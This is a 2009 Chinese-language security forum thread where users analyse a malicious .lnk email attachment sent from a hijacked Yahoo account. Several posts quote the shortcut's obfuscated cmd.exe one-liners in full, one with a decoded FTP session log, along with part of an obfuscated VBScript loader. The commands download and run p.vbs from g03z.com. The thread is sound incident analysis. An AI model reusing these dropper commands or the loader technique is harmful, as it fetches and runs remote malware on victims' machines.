作者主題: *.lnk偽裝檔 (閱讀 15290 次)

emillala · « 於: 2009-03-18 10:23 »

前些日子我們董事長在泰國時，他的yahoo mail寄了封mail給一些幹部和別間公司老闆(應該是直接由通訊錄名單發送)..

以上是前言

這封mail有一附加檔案為"預防帳號盜用.lnk"

我本來以為這是誘使user執行後連結到某網頁致使其產生不良結果

但按右鍵內容一看發現，本應寫上路徑的目標那欄，寫了下面內容..

%windir%\system32\cmd.exe /c echo o web.g03z.com>l&echo aa33>>l&echo bb33>>l&echo set s=echo ge>s.bat&echo set f=t>>s.bat&echo %s%t pnf pnf.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%f%p -s:l>>s.bat&call s.bat&start pnf.vbs&del l s.bat&

哇...這根本不是*.lnk該有的作用，已經像是批次檔了

我是第一次看見把*.lnk當成*.bat或*.cmd的檔案在用

真是無所不用其極呀 = =

剛剛發現，當我把它加入壓縮檔後，會變成cmd.exe.........

http://www.badongo.com/cn/file/13925908--->附件內容供參考

eose · « **回覆 #1 於:** 2009-03-18 10:31 »

可以參考一下比較早以前的文章 http://rogerspeaking.com/2009/02/1893 .
*.lnk通常不會是附件的檔案,建議公司mail要擋這類型的附件.
另外董事長的PC應該有問題摟,主動關心一下吧

emillala · « **回覆 #2 於:** 2009-03-18 10:36 »

引述: eose 於 2009-03-18 10:31

可以參考一下比較早以前的文章 http://rogerspeaking.com/2009/02/1893 .
*.lnk通常不會是附件的檔案,建議公司mail要擋這類型的附件.
另外董事長的PC應該有問題摟,主動關心一下吧

我之前google了一下

好像不是user的問題

是直接從yahoo mail發的

因為之前也發生過其他人的yahoo發出偽裝檔給某人
(壓縮檔名稱"這是不是你的檔案"，然後壓縮檔內容是收件者硬碟裡的一些檔案，而眾多檔案中藏了一個cmd.exe)

把yahoo mail密碼改掉就沒發生過了

eose · « **回覆 #3 於:** 2009-03-18 11:46 »

yahoo自己寄信?那個yahoo信箱會自己寄信的?沒user的帳號密碼怎麼寄信?
那user的帳號密碼要怎麼來? user都透過什麼上yahoo看信寄信?

請想一想...想清楚你就不會這樣認為了.

threeseconds · « **回覆 #4 於:** 2009-04-06 15:53 »

今天我轄區也收到這個案例了，一樣是 .lnk 檔，檔案內部如下

代碼: [選擇]

%ComSpec% /c echo set a=.>s.bat&echo echo o www%a%g03z%a%com^>l>>s.bat&call s.bat&echo aa33>>l&echo bb33>>l&echo set sa=echo g>s.bat&echo set vt=tp ->>s.bat&echo %sa%et q p.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%vt%s:l>>s.bat&call s.bat&start p.vbs&

想做實驗的人可以自行試試看....

該病毒行為是連上 ftp://www.g03z.com
下載病毒執行檔 p.vbs
set 變數的方式令人匪夷所思到想吐血.....

爬起來吐血 · « **回覆 #5 於:** 2009-06-09 11:32 »

小弟有點不明白

那個^符號是什麽意思啊

還有為什麽echo echo bye 這裏有兩個echo

hoyo · « **回覆 #6 於:** 2009-06-09 11:48 »

引述: threeseconds 於 2009-04-06 15:53

今天我轄區也收到這個案例了，一樣是 .lnk 檔，檔案內部如下
代碼: [選擇]
%ComSpec% /c echo set a=.>s.bat&echo echo o www%a%g03z%a%com^>l>>s.bat&call s.bat&echo aa33>>l&echo bb33>>l&echo set sa=echo g>s.bat&echo set vt=tp ->>s.bat&echo %sa%et q p.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%vt%s:l>>s.bat&call s.bat&start p.vbs&想做實驗的人可以自行試試看....

該病毒行為是連上 ftp://www.g03z.com
下載病毒執行檔 p.vbs
set 變數的方式令人匪夷所思到想吐血.....

執行後會自動分解成

代碼: [選擇]

C:\>set a=.

C:\>echo o www.g03z.com 1>l

C:\>set sa=echo g

C:\>set vt=tp -

C:\>echo get q p.vbs 1>>l

C:\>echo bye 1>>l

C:\>ftp -s:l
ftp> o www.g03z.com
Connected to www.g03z.com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www.g03z.com:(none)):
331 User name okay, need password.

230 User logged in, proceed.
ftp> get q p.vbs
200 PORT Command successful.
150 Opening ASCII mode data connection for q (1181 Bytes).
226-Maximum disk quota limited to 102400 kBytes
    Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 1181 bytes received in 0.03Seconds 38.10Kbytes/sec.
ftp> bye
221 Goodbye!

C:\>

p.vbs 簡略內容

代碼: [選擇]

sub k
for i=1 to UBound(strs)
        runner=runner&chr(strs(i)-547)
next
Execute runner
end sub
strs=array(560,630,648,663,579,654,654,579......很長以下省略)
k

k 實際程式碼請參照圖片 ..... (懶得重打一次)

jlovet · « **回覆 #7 於:** 2009-06-09 13:53 »

那個主機代管的admin這麼告訴我

Dear sir,

We had taken appropriate action immediately as to warning user.

Sincerely Yours,

Chief Telecom Inc.

我看他的意思好像是說,我們馬上給這使用者一支口頭警告。
然後就bye了。

我跟Yahoo說,要他們把lnk擋下來。
他告訴我這有可能是偽造地址的郵件,我就又把mail header寄過去。
然後,那個被盜用帳號的可憐人似乎就被封鎖帳號了。
之後還是不斷收到類似的信,竟然都是去抓g03z.com....
上面有四個檔案吧, p,q,s,d

常用的防毒軟體要不是會抓到前面兩個script
就是會抓到後面兩個exe
Bitdefender除外,寄sample過去之後似乎也沒有甚麼反應,讓我對我家的電腦有點擔心,Bitdefender beta使用中...

酷!學園

最新消息: